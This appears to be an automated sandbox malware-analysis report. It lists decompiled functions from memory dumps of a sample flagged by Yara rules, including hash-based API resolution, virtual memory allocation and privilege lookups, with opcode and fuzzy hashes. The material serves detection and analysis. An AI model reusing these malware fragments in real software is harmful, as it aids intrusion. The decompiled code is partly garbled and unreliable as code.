                                                                                    C-Code - Quality: 50%
                                                                                    			E004182EA(void* __eax, void* __ebx, char _a1, void* _a4, void* _a8, void* _a12, void* _a16, void* _a20) {
				void* _t9;
				char* _t29;

				_t9 = __eax - 0xf5;
				asm("popfd");
				_t29 =  &_a1;
				if (_t29 < 0) goto L3;
				_push(_t29);
			}





                                                                                    0x004182ea
                                                                                    0x004182ec
                                                                                    0x004182ee
                                                                                    0x004182ef
                                                                                    0x004182f0

                                                                                    APIs
                                                                                    • NtClose.NTDLL(00413D30,?,?,00413D30,00408AF3,FFFFFFFF), ref: 00418315
                                                                                    Memory Dump Source
                                                                                    • Source File: 00000001.00000002.693323611.0000000000400000.00000040.00000001.sdmp, Offset: 00400000, based on PE: true
                                                                                    Yara matches
                                                                                    Similarity
                                                                                    • API ID: Close
                                                                                    • String ID:
                                                                                    • API String ID: 3535843008-0
                                                                                    • Opcode ID: 99e770959f311ce0b3c1f0f640b19380c9e3587b099295d67f90f48bce30e7bd
                                                                                    • Instruction ID: b43b2f1aff78f2368a5bd9cbf9cc39af3ea3ae8a63b3d1812f99d6b7abf77256
                                                                                    • Opcode Fuzzy Hash: 99e770959f311ce0b3c1f0f640b19380c9e3587b099295d67f90f48bce30e7bd
                                                                                    • Instruction Fuzzy Hash: 0CF082B6200218ABD710EFD9DC80EEB736DEF88324F14865DFA5C9B241CA31E91187A0
                                                                                    Uniqueness

                                                                                    Uniqueness Score: -1.00%

                                                                                    Function 004183A0, Relevance: 1.5, APIs: 1, Instructions: 30memorynativeCOMMON
                                                                                    Download Yara Rule
                                                                                    C-Code - Quality: 100%
                                                                                    			E004183A0(intOrPtr _a4, void* _a8, PVOID* _a12, long _a16, long* _a20, long _a24, long _a28) {
				long _t14;
				void* _t21;

				_t3 = _a4 + 0xc60; // 0xca0
				E00418DC0(_t21, _a4, _t3,  *((intOrPtr*)(_a4 + 0x10)), 0, 0x30);
				_t14 = NtAllocateVirtualMemory(_a8, _a12, _a16, _a20, _a24, _a28); // executed
				return _t14;
			}





                                                                                    0x004183af
                                                                                    0x004183b7
                                                                                    0x004183d9
                                                                                    0x004183dd

                                                                                    APIs
                                                                                    • NtAllocateVirtualMemory.NTDLL(00003000,?,00000000,?,00418F94,?,00000000,?,00003000,00000040,00000000,00000000,00408AF3), ref: 004183D9
                                                                                    Memory Dump Source
                                                                                    • Source File: 00000001.00000002.693323611.0000000000400000.00000040.00000001.sdmp, Offset: 00400000, based on PE: true
                                                                                    Yara matches
                                                                                    Similarity
                                                                                    • API ID: AllocateMemoryVirtual
                                                                                    • String ID:
                                                                                    • API String ID: 2167126740-0
                                                                                    • Opcode ID: b2c7a9f16f7248b886659db27fd6bc2ac43cd74a54ece53f3674161978f52f4b
                                                                                    • Instruction ID: ed05b43336be2385218ce2c210938f1a749d46cd8ec257da0df7421e0e4bafff
                                                                                    • Opcode Fuzzy Hash: b2c7a9f16f7248b886659db27fd6bc2ac43cd74a54ece53f3674161978f52f4b
                                                                                    • Instruction Fuzzy Hash: BCF015B2200208ABCB14DF89DC81EEB77ADAF88754F118549FE0897241CA30F810CBA4
                                                                                    Uniqueness

                                                                                    Uniqueness Score: -1.00%

                                                                                    Function 004182F0, Relevance: 1.5, APIs: 1, Instructions: 20nativeCOMMON
                                                                                    Download Yara Rule
                                                                                    APIs
                                                                                    • NtClose.NTDLL(00413D30,?,?,00413D30,00408AF3,FFFFFFFF), ref: 00418315
                                                                                    Memory Dump Source
                                                                                    • Source File: 00000001.00000002.693323611.0000000000400000.00000040.00000001.sdmp, Offset: 00400000, based on PE: true
                                                                                    Yara matches
                                                                                    Similarity
                                                                                    • API ID: Close
                                                                                    • String ID:
                                                                                    • API String ID: 3535843008-0
                                                                                    • Opcode ID: 462dc2fd90f57a4a7913ee6487bbcc8fe2490777b3746e68c632e34f0b64e1a4
                                                                                    • Instruction ID: fa02b1b0b4c248d7afc65a810b6911db7169f724aa7cfa6c67706bd771296af7
                                                                                    • Opcode Fuzzy Hash: 462dc2fd90f57a4a7913ee6487bbcc8fe2490777b3746e68c632e34f0b64e1a4
                                                                                    • Instruction Fuzzy Hash: F5D01776200314ABD710EF99DC85EE77BACEF48760F154499BA189B282CA30FA0086E0
                                                                                    Uniqueness

                                                                                    Uniqueness Score: -1.00%

                                                                                    Function 00A598F0, Relevance: 1.5, APIs: 1, Instructions: 4libraryCOMMON
                                                                                    Download Yara Rule
                                                                                    APIs
                                                                                    Memory Dump Source
                                                                                    • Source File: 00000001.00000002.693597928.00000000009F0000.00000040.00000001.sdmp, Offset: 009F0000, based on PE: true
                                                                                    Similarity
                                                                                    • API ID: InitializeThunk
                                                                                    • String ID:
                                                                                    • API String ID: 2994545307-0
                                                                                    • Opcode ID: c08059c8d39986c266ec3b564c57194cb51267c14ad3a7dc0f58956e59467117
                                                                                    • Instruction ID: 2b00c330473683cdcf49ca9035436cfe5893d0128b37f70e722e3af19e02d915
                                                                                    • Opcode Fuzzy Hash: c08059c8d39986c266ec3b564c57194cb51267c14ad3a7dc0f58956e59467117
                                                                                    • Instruction Fuzzy Hash: 44900261B0100902D301716A4404616001A97D03C1F91C032A1014555ECE658992F171
                                                                                    Uniqueness

                                                                                    Uniqueness Score: -1.00%

                                                                                    Function 00A59860, Relevance: 1.5, APIs: 1, Instructions: 4libraryCOMMON
                                                                                    Download Yara Rule
                                                                                    APIs
                                                                                    Memory Dump Source
                                                                                    • Source File: 00000001.00000002.693597928.00000000009F0000.00000040.00000001.sdmp, Offset: 009F0000, based on PE: true
                                                                                    Similarity
                                                                                    • API ID: InitializeThunk
                                                                                    • String ID:
                                                                                    • API String ID: 2994545307-0
                                                                                    • Opcode ID: 0fd9178f70a7e71ebd60122c508530301637174e453e49a8a47c0c2c4e299b92
                                                                                    • Instruction ID: 01e38f4eb81fcfc3b52da05435d651a2bf1f17559722dc06c1b3839cd6de977f
                                                                                    • Opcode Fuzzy Hash: 0fd9178f70a7e71ebd60122c508530301637174e453e49a8a47c0c2c4e299b92
                                                                                    • Instruction Fuzzy Hash: 4390027170100813D311616A4504707001997D03C1F91C422A0414558D9A968952F161
                                                                                    Uniqueness

                                                                                    Uniqueness Score: -1.00%

                                                                                    Function 00A59840, Relevance: 1.5, APIs: 1, Instructions: 4libraryCOMMON
                                                                                    Download Yara Rule
                                                                                    APIs
                                                                                    Memory Dump Source
                                                                                    • Source File: 00000001.00000002.693597928.00000000009F0000.00000040.00000001.sdmp, Offset: 009F0000, based on PE: true
                                                                                    Similarity
                                                                                    • API ID: InitializeThunk
                                                                                    • String ID:
                                                                                    • API String ID: 2994545307-0
                                                                                    • Opcode ID: 76474d9bfab59294fd345966eec180c452a464347f18b5f5857acdd24d0f8e4b
                                                                                    • Instruction ID: 477be5eacac807b1c07b371308cb66ba469d016b1b3fba5179a1500f9858a7c3
                                                                                    • Opcode Fuzzy Hash: 76474d9bfab59294fd345966eec180c452a464347f18b5f5857acdd24d0f8e4b
                                                                                    • Instruction Fuzzy Hash: 58900261742045529745B16A44045074016A7E03C1791C022A1404950C89669856E661
                                                                                    Uniqueness

                                                                                    Uniqueness Score: -1.00%

                                                                                    Function 00A599A0, Relevance: 1.5, APIs: 1, Instructions: 4libraryCOMMON
                                                                                    Download Yara Rule
                                                                                    APIs
                                                                                    Memory Dump Source
                                                                                    • Source File: 00000001.00000002.693597928.00000000009F0000.00000040.00000001.sdmp, Offset: 009F0000, based on PE: true
                                                                                    Similarity
                                                                                    • API ID: InitializeThunk
                                                                                    • String ID:
                                                                                    • API String ID: 2994545307-0
                                                                                    • Opcode ID: c00a2ce4298465445edb11e9c75c85e19878800e0dbb6b9d4f21566e1803aea2
                                                                                    • Instruction ID: 1fbeb9f4a196265c319d83f7f7a73e095c4030bce710e7cf97b14c271c05598e
                                                                                    • Opcode Fuzzy Hash: c00a2ce4298465445edb11e9c75c85e19878800e0dbb6b9d4f21566e1803aea2
                                                                                    • Instruction Fuzzy Hash: 229002A174100842D300616A4414B060015D7E1381F51C025E1054554D8A59CC52B166
                                                                                    Uniqueness

                                                                                    Uniqueness Score: -1.00%

                                                                                    Function 00A595D0, Relevance: 1.5, APIs: 1, Instructions: 4libraryCOMMON
                                                                                    Download Yara Rule
                                                                                    APIs
                                                                                    Memory Dump Source
                                                                                    • Source File: 00000001.00000002.693597928.00000000009F0000.00000040.00000001.sdmp, Offset: 009F0000, based on PE: true
                                                                                    Similarity
                                                                                    • API ID: InitializeThunk
                                                                                    • String ID:
                                                                                    • API String ID: 2994545307-0
                                                                                    • Opcode ID: fbfb9f5feffeaa7b535b183bf9533fa37e7865cb3050d168e73e5a9c89fe1301
                                                                                    • Instruction ID: 97a5fda23c1b24338368ea9b93c6915b1a90db8d41c29f0a2ca1da82ad4ff69c
                                                                                    • Opcode Fuzzy Hash: fbfb9f5feffeaa7b535b183bf9533fa37e7865cb3050d168e73e5a9c89fe1301
                                                                                    • Instruction Fuzzy Hash: 279002A1702004038305716A4414616401A97E0381B51C031E1004590DC9658891B165
                                                                                    Uniqueness

                                                                                    Uniqueness Score: -1.00%

                                                                                    Function 00A59910, Relevance: 1.5, APIs: 1, Instructions: 4libraryCOMMON
                                                                                    Download Yara Rule
                                                                                    APIs
                                                                                    Memory Dump Source
                                                                                    • Source File: 00000001.00000002.693597928.00000000009F0000.00000040.00000001.sdmp, Offset: 009F0000, based on PE: true
                                                                                    Similarity
                                                                                    • API ID: InitializeThunk
                                                                                    • String ID:
                                                                                    • API String ID: 2994545307-0
                                                                                    • Opcode ID: 936d5bd431cf65b5440d1e8f2c05715cab3582f30257bc2d7c5389eb7797b1f1
                                                                                    • Instruction ID: 5051a8728ddcd3ddaff522636ca02e390124de473acfd13d3dc867be3d27cc7d
                                                                                    • Opcode Fuzzy Hash: 936d5bd431cf65b5440d1e8f2c05715cab3582f30257bc2d7c5389eb7797b1f1
                                                                                    • Instruction Fuzzy Hash: DD9002B170100802D340716A4404746001597D0381F51C021A5054554E8A998DD5B6A5
                                                                                    Uniqueness

                                                                                    Uniqueness Score: -1.00%

                                                                                    Function 00A59540, Relevance: 1.5, APIs: 1, Instructions: 4libraryCOMMON
                                                                                    Download Yara Rule
                                                                                    APIs
                                                                                    Memory Dump Source
                                                                                    • Source File: 00000001.00000002.693597928.00000000009F0000.00000040.00000001.sdmp, Offset: 009F0000, based on PE: true
                                                                                    Similarity
                                                                                    • API ID: InitializeThunk
                                                                                    • String ID:
                                                                                    • API String ID: 2994545307-0
                                                                                    • Opcode ID: 9fce2cec09b9c17aa8ba3fee7f6746af26cbcdbd32e5d25265f79c6b781eed8d
                                                                                    • Instruction ID: 3c2fbcffac64722869632978d3dd2c1f220107397aff334f17e908825ffe6250
                                                                                    • Opcode Fuzzy Hash: 9fce2cec09b9c17aa8ba3fee7f6746af26cbcdbd32e5d25265f79c6b781eed8d
                                                                                    • Instruction Fuzzy Hash: C9900265711004034305A56A0704507005697D53D1351C031F1005550CDA618861A161
                                                                                    Uniqueness

                                                                                    Uniqueness Score: -1.00%

                                                                                    Function 00A596E0, Relevance: 1.5, APIs: 1, Instructions: 4libraryCOMMON
                                                                                    Download Yara Rule
                                                                                    APIs
                                                                                    Memory Dump Source
                                                                                    • Source File: 00000001.00000002.693597928.00000000009F0000.00000040.00000001.sdmp, Offset: 009F0000, based on PE: true
                                                                                    Similarity
                                                                                    • API ID: InitializeThunk
                                                                                    • String ID:
                                                                                    • API String ID: 2994545307-0
                                                                                    • Opcode ID: 85c60e06488a2dbb414fb88158553794bea4ed22ea3219c4e98284aa01e2d55b
                                                                                    • Instruction ID: acee84d3fe0d625309e564dda8a708dcdfa0cdb1c4c0dc461eeb2c6f632d8efd
                                                                                    • Opcode Fuzzy Hash: 85c60e06488a2dbb414fb88158553794bea4ed22ea3219c4e98284aa01e2d55b
                                                                                    • Instruction Fuzzy Hash: C490027170108C02D310616A840474A001597D0381F55C421A4414658D8AD58891B161
                                                                                    Uniqueness

                                                                                    Uniqueness Score: -1.00%

                                                                                    Function 00A59A20, Relevance: 1.5, APIs: 1, Instructions: 4libraryCOMMON
                                                                                    Download Yara Rule
                                                                                    APIs
                                                                                    Memory Dump Source
                                                                                    • Source File: 00000001.00000002.693597928.00000000009F0000.00000040.00000001.sdmp, Offset: 009F0000, based on PE: true
                                                                                    Similarity
                                                                                    • API ID: InitializeThunk
                                                                                    • String ID:
                                                                                    • API String ID: 2994545307-0
                                                                                    • Opcode ID: 8d87454f5c46e5fae9c03f0ee6a79da31d78d625c62e16acc8297979d1d2ccc2
                                                                                    • Instruction ID: 30ebf4fa561121fd242759a935b580e6bdf509c03ba0b502e53968c5a268aa1f
                                                                                    • Opcode Fuzzy Hash: 8d87454f5c46e5fae9c03f0ee6a79da31d78d625c62e16acc8297979d1d2ccc2
                                                                                    • Instruction Fuzzy Hash: 70900261B01004428340717A88449064015BBE1391751C131A0988550D89998865A6A5
                                                                                    Uniqueness

                                                                                    Uniqueness Score: -1.00%

                                                                                    Function 00A59A00, Relevance: 1.5, APIs: 1, Instructions: 4libraryCOMMON
                                                                                    Download Yara Rule
                                                                                    APIs
                                                                                    Memory Dump Source
                                                                                    • Source File: 00000001.00000002.693597928.00000000009F0000.00000040.00000001.sdmp, Offset: 009F0000, based on PE: true
                                                                                    Similarity
                                                                                    • API ID: InitializeThunk
                                                                                    • String ID:
                                                                                    • API String ID: 2994545307-0
                                                                                    • Opcode ID: f2874a4afe4d6c3c55638502c95c54242dc153b9df6319b867c8b7d54638b4f9
                                                                                    • Instruction ID: d708d50572dabf77037ba65f7d06f9c39b79d4fd425a6ffc4f606378db7112e4
                                                                                    • Opcode Fuzzy Hash: f2874a4afe4d6c3c55638502c95c54242dc153b9df6319b867c8b7d54638b4f9
                                                                                    • Instruction Fuzzy Hash: 7D90027170140802D300616A481470B001597D0382F51C021A1154555D8A658851B5B1
                                                                                    Uniqueness

                                                                                    Uniqueness Score: -1.00%

                                                                                    Function 00A59660, Relevance: 1.5, APIs: 1, Instructions: 4libraryCOMMON
                                                                                    Download Yara Rule
                                                                                    APIs
                                                                                    Memory Dump Source
                                                                                    • Source File: 00000001.00000002.693597928.00000000009F0000.00000040.00000001.sdmp, Offset: 009F0000, based on PE: true
                                                                                    Similarity
                                                                                    • API ID: InitializeThunk
                                                                                    • String ID:
                                                                                    • API String ID: 2994545307-0
                                                                                    • Opcode ID: 9c6d0281acda6bb6bfb3b45eff6439eed52d16c1f93929b52b8d5e5341128b18
                                                                                    • Instruction ID: 415763800343310357bec0ac22a3169653c4b1ef28b9263ff1170b2231815032
                                                                                    • Opcode Fuzzy Hash: 9c6d0281acda6bb6bfb3b45eff6439eed52d16c1f93929b52b8d5e5341128b18
                                                                                    • Instruction Fuzzy Hash: 0090027170100C02D380716A440464A001597D1381F91C025A0015654DCE558A59B7E1
                                                                                    Uniqueness

                                                                                    Uniqueness Score: -1.00%

                                                                                    Function 00A59A50, Relevance: 1.5, APIs: 1, Instructions: 4libraryCOMMON
                                                                                    Download Yara Rule
                                                                                    APIs
                                                                                    Memory Dump Source
                                                                                    • Source File: 00000001.00000002.693597928.00000000009F0000.00000040.00000001.sdmp, Offset: 009F0000, based on PE: true
                                                                                    Similarity
                                                                                    • API ID: InitializeThunk
                                                                                    • String ID:
                                                                                    • API String ID: 2994545307-0
                                                                                    • Opcode ID: 500c44e3be1ebae3b88be177c01495a81812d1b5c42fe38173ded41edabcfa49
                                                                                    • Instruction ID: ae95439018a33f882898933aeccbda1d1cead807cff01d8db03f8af9d688d9e4
                                                                                    • Opcode Fuzzy Hash: 500c44e3be1ebae3b88be177c01495a81812d1b5c42fe38173ded41edabcfa49
                                                                                    • Instruction Fuzzy Hash: 5A90026171180442D300657A4C14B07001597D0383F51C125A0144554CCD558861A561
                                                                                    Uniqueness

                                                                                    Uniqueness Score: -1.00%

                                                                                    Function 00A597A0, Relevance: 1.5, APIs: 1, Instructions: 4libraryCOMMON
                                                                                    Download Yara Rule
                                                                                    APIs
                                                                                    Memory Dump Source
                                                                                    • Source File: 00000001.00000002.693597928.00000000009F0000.00000040.00000001.sdmp, Offset: 009F0000, based on PE: true
                                                                                    Similarity
                                                                                    • API ID: InitializeThunk
                                                                                    • String ID:
                                                                                    • API String ID: 2994545307-0
                                                                                    • Opcode ID: 0998dbb045e614b6d7d4b98059353b25502db52f8af53fa24aac7ee3053f24cc
                                                                                    • Instruction ID: 49c418bf6b4fa4533d0552a5655c2a86f22815154000726435ef00713740f73b
                                                                                    • Opcode Fuzzy Hash: 0998dbb045e614b6d7d4b98059353b25502db52f8af53fa24aac7ee3053f24cc
                                                                                    • Instruction Fuzzy Hash: C490026170100403D340716A54186064015E7E1381F51D021E0404554CDD558856A262
                                                                                    Uniqueness

                                                                                    Uniqueness Score: -1.00%

                                                                                    Function 00A59780, Relevance: 1.5, APIs: 1, Instructions: 4libraryCOMMON
                                                                                    Download Yara Rule
                                                                                    APIs
                                                                                    Memory Dump Source
                                                                                    • Source File: 00000001.00000002.693597928.00000000009F0000.00000040.00000001.sdmp, Offset: 009F0000, based on PE: true
                                                                                    Similarity
                                                                                    • API ID: InitializeThunk
                                                                                    • String ID:
                                                                                    • API String ID: 2994545307-0
                                                                                    • Opcode ID: e98bbc099bb8e94ac721689e7872aa5c8358b902886a179c029f6f7bf5316b1b
                                                                                    • Instruction ID: f0b6b775975589f6b4309cfb8acaae6ef9e715327430011db5a0b8ae1c1d3095
                                                                                    • Opcode Fuzzy Hash: e98bbc099bb8e94ac721689e7872aa5c8358b902886a179c029f6f7bf5316b1b
                                                                                    • Instruction Fuzzy Hash: 8690026971300402D380716A540860A001597D1382F91D425A0005558CCD558869A361
                                                                                    Uniqueness

                                                                                    Uniqueness Score: -1.00%

                                                                                    Function 00A59FE0, Relevance: 1.5, APIs: 1, Instructions: 4libraryCOMMON
                                                                                    Download Yara Rule
                                                                                    APIs
                                                                                    Memory Dump Source
                                                                                    • Source File: 00000001.00000002.693597928.00000000009F0000.00000040.00000001.sdmp, Offset: 009F0000, based on PE: true
                                                                                    Similarity
                                                                                    • API ID: InitializeThunk
                                                                                    • String ID:
                                                                                    • API String ID: 2994545307-0
                                                                                    • Opcode ID: d90012ec0874383484f30e3b2f1b1fde0c9dae8f37da40abaf4ee90da3b8eaab
                                                                                    • Instruction ID: bc0227ddc7d66caa55359caec6db9ceb3794921905d00be3326b7f05283b4343
                                                                                    • Opcode Fuzzy Hash: d90012ec0874383484f30e3b2f1b1fde0c9dae8f37da40abaf4ee90da3b8eaab
                                                                                    • Instruction Fuzzy Hash: 0390027171114802D310616A8404706001597D1381F51C421A0814558D8AD58891B162
                                                                                    Uniqueness

                                                                                    Uniqueness Score: -1.00%

                                                                                    Function 00A59710, Relevance: 1.5, APIs: 1, Instructions: 4libraryCOMMON
                                                                                    Download Yara Rule
                                                                                    APIs
                                                                                    Memory Dump Source
                                                                                    • Source File: 00000001.00000002.693597928.00000000009F0000.00000040.00000001.sdmp, Offset: 009F0000, based on PE: true
                                                                                    Similarity
                                                                                    • API ID: InitializeThunk
                                                                                    • String ID:
                                                                                    • API String ID: 2994545307-0
                                                                                    • Opcode ID: 751c9a40a795ac05bb600dfd0ca15db1be191e187a6359e9bf4fed078ae5554a
                                                                                    • Instruction ID: 3cee61e60112844d0df5cb95c008094d7d31ab21efc8912c3928464fdf4ba83b
                                                                                    • Opcode Fuzzy Hash: 751c9a40a795ac05bb600dfd0ca15db1be191e187a6359e9bf4fed078ae5554a
                                                                                    • Instruction Fuzzy Hash: 6F90027170100802D30065AA5408646001597E0381F51D021A5014555ECAA58891B171
                                                                                    Uniqueness

                                                                                    Uniqueness Score: -1.00%

                                                                                    Function 004088B0, Relevance: .1, Instructions: 92COMMON
                                                                                    Download Yara Rule
                                                                                    Memory Dump Source
                                                                                    • Source File: 00000001.00000002.693323611.0000000000400000.00000040.00000001.sdmp, Offset: 00400000, based on PE: true
                                                                                    Yara matches
                                                                                    Similarity
                                                                                    • API ID:
                                                                                    • String ID:
                                                                                    • API String ID:
                                                                                    • Opcode ID: 67bb4e2207c22d687f6acc024d55c7e0c161e5d4599185de851a30ee67947c6b
                                                                                    • Instruction ID: aa626ceb7ef0a3bcdbf1efb1d9dc2f5a7bb3811b4857f0e914c6161f28eec10c
                                                                                    • Opcode Fuzzy Hash: 67bb4e2207c22d687f6acc024d55c7e0c161e5d4599185de851a30ee67947c6b
                                                                                    • Instruction Fuzzy Hash: FE213AB3D402085BDB10E6649D42BFF73AC9B50304F44057FF989A3182F638BB4987A6
                                                                                    Uniqueness

                                                                                    Uniqueness Score: -1.00%

                                                                                    Function 00407260, Relevance: 1.6, APIs: 1, Instructions: 55threadwindowCOMMON
                                                                                    Download Yara Rule
                                                                                    C-Code - Quality: 82%
                                                                                    			E00407260(void* __eflags, intOrPtr _a4, long _a8) {
				char _v67;
				char _v68;
				void* _t12;
				intOrPtr* _t13;
				int _t14;
				long _t21;
				intOrPtr* _t25;
				void* _t26;
				void* _t30;

				_t30 = __eflags;
				_v68 = 0;
				L00419D20( &_v67, 0, 0x3f);
				E0041A900( &_v68, 3);
				_t12 = E00409B20(_t30, _a4 + 0x1c,  &_v68); // executed
				_t13 = L00413E30(_a4 + 0x1c, _t12, 0, 0, 0xc4e7b6d6);
				_t25 = _t13;
				if(_t25 != 0) {
					_t21 = _a8;
					_t14 = PostThreadMessageW(_t21, 0x111, 0, 0); // executed
					_t32 = _t14;
					if(_t14 == 0) {
						_t14 =  *_t25(_t21, 0x8003, _t26 + (E00409280(_t32, 1, 8) & 0x000000ff) - 0x40, _t14);
					}
					return _t14;
				}
				return _t13;
			}












                                                                                    0x00407260
                                                                                    0x0040726f
                                                                                    0x00407273
                                                                                    0x0040727e
                                                                                    0x0040728e
                                                                                    0x0040729e
                                                                                    0x004072a3
                                                                                    0x004072aa
                                                                                    0x004072ad
                                                                                    0x004072ba
                                                                                    0x004072bc
                                                                                    0x004072be
                                                                                    0x004072db
                                                                                    0x004072db
                                                                                    0x00000000
                                                                                    0x004072dd
                                                                                    0x004072e2

                                                                                    APIs
                                                                                    • PostThreadMessageW.USER32(?,00000111,00000000,00000000,?), ref: 004072BA
                                                                                    Memory Dump Source
                                                                                    • Source File: 00000001.00000001.650458502.0000000000400000.00000040.00020000.sdmp, Offset: 00400000, based on PE: true
                                                                                    Yara matches
                                                                                    Similarity
                                                                                    • API ID: MessagePostThread
                                                                                    • String ID:
                                                                                    • API String ID: 1836367815-0
                                                                                    • Opcode ID: 2611248cf2981be21f72ca7afad4f10f88413beaa9ea5ad5021ab45b4f53d4d7
                                                                                    • Instruction ID: bbcd0b2e5740072d15388175686a93538b06234ac68ffc2b081785cbfc84dfa6
                                                                                    • Opcode Fuzzy Hash: 2611248cf2981be21f72ca7afad4f10f88413beaa9ea5ad5021ab45b4f53d4d7
                                                                                    • Instruction Fuzzy Hash: 2B01D431A8022876E720A6959C03FFF772C9B00B54F05405EFF04BA1C2E6A87D0682EA
                                                                                    Uniqueness

                                                                                    Uniqueness Score: -1.00%

                                                                                    Function 004184C3, Relevance: 1.5, APIs: 1, Instructions: 26memoryCOMMON
                                                                                    Download Yara Rule
                                                                                    C-Code - Quality: 53%
                                                                                    			E004184C3(void* __edx, intOrPtr _a4, void* _a8, long _a12, void* _a16) {
				void* _v117;
				char _t12;
				void* _t19;

				asm("aas");
				asm("repne aad 0xa9");
				asm("in eax, dx");
				_t9 = _a4;
				_t5 = _t9 + 0xc74; // 0xc74
				E00418DC0(_t19, _a4, _t5,  *((intOrPtr*)(_a4 + 0x10)), 0, 0x35);
				_t12 = RtlFreeHeap(_a8, _a12, _a16); // executed
				return _t12;
			}






                                                                                    0x004184c3
                                                                                    0x004184c4
                                                                                    0x004184ce
                                                                                    0x004184d3
                                                                                    0x004184df
                                                                                    0x004184e7
                                                                                    0x004184fd
                                                                                    0x00418501

                                                                                    APIs
                                                                                    • RtlFreeHeap.NTDLL(00000060,00408AF3,?,?,00408AF3,00000060,00000000,00000000,?,?,00408AF3,?,00000000), ref: 004184FD
                                                                                    Memory Dump Source
                                                                                    • Source File: 00000001.00000002.693323611.0000000000400000.00000040.00000001.sdmp, Offset: 00400000, based on PE: true
                                                                                    Yara matches
                                                                                    Similarity
                                                                                    • API ID: FreeHeap
                                                                                    • String ID:
                                                                                    • API String ID: 3298025750-0
                                                                                    • Opcode ID: 2e62f55243c069a2d383d39422ca7254204f95d8ecccee7086d39a7c5616c67d
                                                                                    • Instruction ID: fa8e98aefead33b4ad2b43290c945b21301be2d8cc6ddb2f24b3ff36b4822937
                                                                                    • Opcode Fuzzy Hash: 2e62f55243c069a2d383d39422ca7254204f95d8ecccee7086d39a7c5616c67d
                                                                                    • Instruction Fuzzy Hash: 0BE06DB5500215AFC718DF55DC4AE9BB76CAF84300F118A9AF9085B291C631A814CAA0
                                                                                    Uniqueness

                                                                                    Uniqueness Score: -1.00%

                                                                                    Function 004184D0, Relevance: 1.5, APIs: 1, Instructions: 24memoryCOMMON
                                                                                    Download Yara Rule
                                                                                    C-Code - Quality: 100%
                                                                                    			E004184D0(intOrPtr _a4, void* _a8, long _a12, void* _a16) {
				char _t10;
				void* _t15;

				_t3 = _a4 + 0xc74; // 0xc74
				L00418DC0(_t15, _a4, _t3,  *((intOrPtr*)(_a4 + 0x10)), 0, 0x35);
				_t10 = RtlFreeHeap(_a8, _a12, _a16); // executed
				return _t10;
			}





                                                                                    0x004184df
                                                                                    0x004184e7
                                                                                    0x004184fd
                                                                                    0x00418501

                                                                                    APIs
                                                                                    • RtlFreeHeap.NTDLL(00000060,00408AF3,?,?,00408AF3,00000060,00000000,00000000,?,?,00408AF3,?,00000000), ref: 004184FD
                                                                                    Memory Dump Source
                                                                                    • Source File: 00000001.00000001.650458502.0000000000400000.00000040.00020000.sdmp, Offset: 00400000, based on PE: true
                                                                                    Yara matches
                                                                                    Similarity
                                                                                    • API ID: FreeHeap
                                                                                    • String ID:
                                                                                    • API String ID: 3298025750-0
                                                                                    • Opcode ID: c73a038728a0c461ae7389dd2c659cb336152b082840842379cc140023e4f07c
                                                                                    • Instruction ID: 0c1265b7fbf046cbfd36917309396888787f1b5b9f48543de1c0af89871077f5
                                                                                    • Opcode Fuzzy Hash: c73a038728a0c461ae7389dd2c659cb336152b082840842379cc140023e4f07c
                                                                                    • Instruction Fuzzy Hash: 2EE01AB12002046BD714DF59DC45EA777ACAF88750F014559F90857241CA30E9108AB0
                                                                                    Uniqueness

                                                                                    Uniqueness Score: -1.00%

                                                                                    Function 00418490, Relevance: 1.5, APIs: 1, Instructions: 24memoryCOMMON
                                                                                    Download Yara Rule
                                                                                    C-Code - Quality: 100%
                                                                                    			E00418490(intOrPtr _a4, void* _a8, long _a12, long _a16) {
				void* _t10;
				void* _t15;

				L00418DC0(_t15, _a4, _a4 + 0xc70,  *((intOrPtr*)(_a4 + 0x10)), 0, 0x34);
				_t10 = RtlAllocateHeap(_a8, _a12, _a16); // executed
				return _t10;
			}





                                                                                    0x004184a7
                                                                                    0x004184bd
                                                                                    0x004184c1

                                                                                    APIs
                                                                                    • RtlAllocateHeap.NTDLL(00413516,?,00413C8F,00413C8F,?,00413516,?,?,?,?,?,00000000,00408AF3,?), ref: 004184BD
                                                                                    Memory Dump Source
                                                                                    • Source File: 00000001.00000001.650458502.0000000000400000.00000040.00020000.sdmp, Offset: 00400000, based on PE: true
                                                                                    Yara matches
                                                                                    Similarity
                                                                                    • API ID: AllocateHeap
                                                                                    • String ID:
                                                                                    • API String ID: 1279760036-0
                                                                                    • Opcode ID: 5b685ba00e4f3e285a347290f69675979fbe5b3df3c61f88542a29b4b9d62cf4
                                                                                    • Instruction ID: d4cd8ba0fc8cb19801f053331f4cf649e26225416c3eadc5d6da7764d9533391
                                                                                    • Opcode Fuzzy Hash: 5b685ba00e4f3e285a347290f69675979fbe5b3df3c61f88542a29b4b9d62cf4
                                                                                    • Instruction Fuzzy Hash: 81E012B1200208ABDB14EF99DC41EA777ACAF88654F118559FA085B282CA30F9108AB0
                                                                                    Uniqueness

                                                                                    Uniqueness Score: -1.00%

                                                                                    Function 00418630, Relevance: 1.5, APIs: 1, Instructions: 24COMMON
                                                                                    Download Yara Rule
                                                                                    C-Code - Quality: 100%
                                                                                    			E00418630(intOrPtr _a4, WCHAR* _a8, WCHAR* _a12, struct _LUID* _a16) {
				int _t10;
				void* _t15;

				L00418DC0(_t15, _a4, _a4 + 0xc8c,  *((intOrPtr*)(_a4 + 0xa18)), 0, 0x46);
				_t10 = LookupPrivilegeValueW(_a8, _a12, _a16); // executed
				return _t10;
			}





                                                                                    0x0041864a
                                                                                    0x00418660
                                                                                    0x00418664

                                                                                    APIs
                                                                                    • LookupPrivilegeValueW.ADVAPI32(00000000,00000041,0040CFA2,0040CFA2,00000041,00000000,?,00408B65), ref: 00418660
                                                                                    Memory Dump Source
                                                                                    • Source File: 00000001.00000001.650458502.0000000000400000.00000040.00020000.sdmp, Offset: 00400000, based on PE: true
                                                                                    Yara matches
                                                                                    Similarity
                                                                                    • API ID: LookupPrivilegeValue
                                                                                    • String ID:
                                                                                    • API String ID: 3899507212-0
                                                                                    • Opcode ID: 6066231f07dbbfb97dda43844c8c8cc76a5ad0e3334111b5d8a4297bdf0bdfe7
                                                                                    • Instruction ID: a95af6b202be8dae21372797db95a078404a8f30fafd20f5c772dce95c9aa66f
                                                                                    • Opcode Fuzzy Hash: 6066231f07dbbfb97dda43844c8c8cc76a5ad0e3334111b5d8a4297bdf0bdfe7
                                                                                    • Instruction Fuzzy Hash: 31E01AB12002086BDB10DF49DC85EE737ADAF89650F018559FA0857241CA34E8108BF5
                                                                                    Uniqueness

                                                                                    Uniqueness Score: -1.00%

                                                                                    Function 00418510, Relevance: 1.5, APIs: 1, Instructions: 20COMMON
                                                                                    Download Yara Rule
